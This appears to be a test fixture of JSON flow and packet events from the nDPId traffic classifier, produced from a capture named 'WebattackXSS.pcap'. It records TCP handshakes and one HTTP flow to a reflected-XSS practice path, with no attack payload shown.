-00487{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":8593,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":607,"flow_packet_id":1,"flow_last_seen":1499348003742,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499348003742,"pkt":"ABm5CmnxAMGxFOsxCABFAAA8Q\/NAAD4Ggd2sEAABwKgKMoiKAFCK7JhGAAAAAKACchDWBAAAAgQFtAQCCAoBPNu1AAAAAAEDAwc="} -00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":8594,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":607,"flow_packet_id":2,"flow_last_seen":1499348003742,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499348003742,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQiIrxrFQGiuyYR6AScSDgIAAAAgQFtAQCCAoD5q0pATzbtQEDAwc="} -00476{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":8595,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":607,"flow_packet_id":3,"flow_last_seen":1499348003743,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1499348003743,"pkt":"ABm5CmnxAMGxFOsxCABFAAA0Q\/RAAD4GgeSsEAABwKgKMoiKAFCK7JhH8axUB4AQAOV\/KAAAAQEICgE827UD5q0p"} 
-00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":8611,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":608,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499348006334,"flow_last_seen":1499348006334,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499348006334,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":34980,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":8611,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":608,"flow_packet_id":1,"flow_last_seen":1499348006334,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499348006334,"pkt":"ABm5CmnxAMGxFOsxCABFAAA8NJlAAD4GkTesEAABwKgKMoikAFAqsOqkAAAAAKACchDhQAAAAgQFtAQCCAoBPN49AAAAAAEDAwc="} -00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":8612,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":608,"flow_packet_id":2,"flow_last_seen":1499348006334,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499348006334,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQiKQqwf7AKrDqpaAScSAFBgAAAgQFtAQCCAoD5q+xATzePQEDAwc="} 
-00474{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":8613,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":608,"flow_packet_id":3,"flow_last_seen":1499348006335,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1499348006335,"pkt":"ABm5CmnxAMGxFOsxCABFAAA0NJpAAD4GkT6sEAABwKgKMoikAFAqsOqlKsH+wYAQAOWkDQAAAQEICgE83j0D5q+x"} -00973{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":8623,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":606,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1499348002450,"flow_last_seen":1499348007347,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":383,"flow_tot_l4_payload_len":383,"flow_avg_l4_payload_len":95,"midstream":0,"thread_ts_msec":1499348007347,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":34940,"dst_port":80,"l4_proto":"tcp","ndpi": {"flow_risk": {"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"205.174.165.68","url":"205.174.165.68\/dv\/vulnerabilities\/xss_r\/","code":0,"content_type":"","user_agent":"Mozilla\/5.0 (X11; Linux x86_64; rv:45.0) Gecko\/20100101 Firefox\/45.0"}} 
-00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":8627,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":609,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499348007599,"flow_last_seen":1499348007599,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499348007599,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":34994,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":8627,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":609,"flow_packet_id":1,"flow_last_seen":1499348007599,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499348007599,"pkt":"ABm5CmnxAMGxFOsxCABFAAA8+WFAAD4GzG6sEAABwKgKMoiyAFBEayYYAAAAAKACchCKyAAAAgQFtAQCCAoBPN95AAAAAAEDAwc="} -00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":8628,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":609,"flow_packet_id":2,"flow_last_seen":1499348007599,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499348007599,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQiLJr5HteRGsmGaAScSDvkAAAAgQFtAQCCAoD5rDtATzfeQEDAwc="} 
-00474{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":8629,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":609,"flow_packet_id":3,"flow_last_seen":1499348007600,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1499348007600,"pkt":"ABm5CmnxAMGxFOsxCABFAAA0+WJAAD4GzHWsEAABwKgKMoiyAFBEayYZa+R7X4AQAOWOmAAAAQEICgE833kD5rDt"} -00657{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":8642,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":535,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347877292,"flow_last_seen":1499347882869,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499348008904,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":33634,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} -00582{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":8642,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":535,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347877292,"flow_last_seen":1499347882869,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499348008904,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":33634,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00657{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":8642,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":536,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347878568,"flow_last_seen":1499347883869,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499348008904,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":33648,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} -00582{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":8642,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":536,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347878568,"flow_last_seen":1499347883869,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499348008904,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":33648,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00657{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":8642,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":537,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347881141,"flow_last_seen":1499347886869,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499348008904,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":33674,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} 
-00582{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":8642,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":537,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347881141,"flow_last_seen":1499347886869,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499348008904,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":33674,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00657{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":8642,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":538,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347882404,"flow_last_seen":1499347887870,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499348008904,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":33688,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} -00582{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":8642,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":538,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347882404,"flow_last_seen":1499347887870,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499348008904,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":33688,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00657{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":8642,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":539,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347883693,"flow_last_seen":1499347888870,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499348008904,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":33702,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} -00582{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":8642,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":539,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347883693,"flow_last_seen":1499347888870,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499348008904,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":33702,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":8645,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":610,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499348010145,"flow_last_seen":1499348010145,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499348010145,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":35020,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":8645,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":610,"flow_packet_id":1,"flow_last_seen":1499348010145,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499348010145,"pkt":"ABm5CmnxAMGxFOsxCABFAAA81alAAD4G8CasEAABwKgKMojMAFACvDRcAAAAAKACchC7nQAAAgQFtAQCCAoBPOH1AAAAAAEDAwc="} -00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":8646,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":610,"flow_packet_id":2,"flow_last_seen":1499348010145,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499348010145,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQiMxKQ6iIArw0XaAScSASYQAAAgQFtAQCCAoD5rNpATzh9QEDAwc="} -00474{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":8647,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":610,"flow_packet_id":3,"flow_last_seen":1499348010146,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1499348010146,"pkt":"ABm5CmnxAMGxFOsxCABFAAA01apAAD4G8C2sEAABwKgKMojMAFACvDRdSkOoiYAQAOWxZwAAAQEICgE84fYD5rNp"} 
-00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":8654,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":611,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499348011433,"flow_last_seen":1499348011433,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499348011433,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":35034,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00487{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":8654,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":611,"flow_packet_id":1,"flow_last_seen":1499348011433,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499348011433,"pkt":"ABm5CmnxAMGxFOsxCABFAAA89\/VAAD4GzdqsEAABwKgKMojaAFB2oBTCAAAAAKACchBmAwAAAgQFtAQCCAoBPOM3AAAAAAEDAwc="} -00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":8655,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":611,"flow_packet_id":2,"flow_last_seen":1499348011433,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499348011433,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQiNplHDbhdqAUw6AScSASUwAAAgQFtAQCCAoD5rSrATzjNwEDAwc="} 
-00475{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":8656,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":611,"flow_packet_id":3,"flow_last_seen":1499348011433,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1499348011433,"pkt":"ABm5CmnxAMGxFOsxCABFAAA09\/ZAAD4GzeGsEAABwKgKMojaAFB2oBTDZRw24oAQAOWxWgAAAQEICgE84zcD5rSr"} -00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":8666,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":612,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499348012728,"flow_last_seen":1499348012728,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499348012728,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":35048,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":8666,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":612,"flow_packet_id":1,"flow_last_seen":1499348012728,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499348012728,"pkt":"ABm5CmnxAMGxFOsxCABFAAA8MbdAAD4GlBmsEAABwKgKMojoAFBoxNXMAAAAAKACchCxggAAAgQFtAQCCAoBPOR7AAAAAAEDAwc="} 
-00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":8667,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":612,"flow_packet_id":2,"flow_last_seen":1499348012728,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499348012728,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQiOhwV55UaMTVzaAScSDp3wAAAgQFtAQCCAoD5rXvATzkewEDAwc="} -00474{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":8668,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":612,"flow_packet_id":3,"flow_last_seen":1499348012729,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1499348012729,"pkt":"ABm5CmnxAMGxFOsxCABFAAA0MbhAAD4GlCCsEAABwKgKMojoAFBoxNXNcFeeVYAQAOWI5wAAAQEICgE85HsD5rXv"} -00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":8684,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":613,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499348015250,"flow_last_seen":1499348015250,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499348015250,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":35074,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00487{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":8684,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":613,"flow_packet_id":1,"flow_last_seen":1499348015250,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499348015250,"pkt":"ABm5CmnxAMGxFOsxCABFAAA8SaJAAD4GfC6sEAABwKgKMokCAFA1NK9QAAAAAKACchAI\/gAAAgQFtAQCCAoBPObyAAAAAAEDAwc="} -00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":8685,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":613,"flow_packet_id":2,"flow_last_seen":1499348015250,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499348015250,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQiQJJKiEWNTSvUaAScSDjTwAAAgQFtAQCCAoD5rhmATzm8gEDAwc="} -00474{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":8686,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":613,"flow_packet_id":3,"flow_last_seen":1499348015251,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1499348015251,"pkt":"ABm5CmnxAMGxFOsxCABFAAA0SaNAAD4GfDWsEAABwKgKMokCAFA1NK9RSSohF4AQAOWCVwAAAQEICgE85vID5rhm"} 
-00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":8696,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":614,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499348016526,"flow_last_seen":1499348016526,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499348016526,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":35088,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":8696,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":614,"flow_packet_id":1,"flow_last_seen":1499348016526,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499348016526,"pkt":"ABm5CmnxAMGxFOsxCABFAAA82X9AAD4G7FCsEAABwKgKMokQAFAj2zFPAAAAAKACchCXDAAAAgQFtAQCCAoBPOgwAAAAAAEDAwc="} -00487{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":8697,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":614,"flow_packet_id":2,"flow_last_seen":1499348016526,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499348016526,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQiRBmO\/1xI9sxUKAScSB2swAAAgQFtAQCCAoD5rmkATzoMAEDAwc="} 
-00474{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":8698,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":614,"flow_packet_id":3,"flow_last_seen":1499348016526,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1499348016526,"pkt":"ABm5CmnxAMGxFOsxCABFAAA02YBAAD4G7FesEAABwKgKMokQAFAj2zFQZjv9coAQAOUVugAAAQEICgE86DED5rmk"} -00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":8717,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":615,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499348019059,"flow_last_seen":1499348019059,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499348019059,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":35114,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":8717,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":615,"flow_packet_id":1,"flow_last_seen":1499348019059,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499348019059,"pkt":"ABm5CmnxAMGxFOsxCABFAAA8bDdAAD4GWZmsEAABwKgKMokqAFBENIadAAAAAKACchAe0QAAAgQFtAQCCAoBPOqqAAAAAAEDAwc="} 
-00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":8718,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":615,"flow_packet_id":2,"flow_last_seen":1499348019059,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499348019059,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQiSoKVvNnRDSGnqAScSBh7QAAAgQFtAQCCAoD5rweATzqqgEDAwc="} -00474{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":8719,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":615,"flow_packet_id":3,"flow_last_seen":1499348019059,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1499348019059,"pkt":"ABm5CmnxAMGxFOsxCABFAAA0bDhAAD4GWaCsEAABwKgKMokqAFBENIaeClbzaIAQAOUA9QAAAQEICgE86qoD5rwe"} 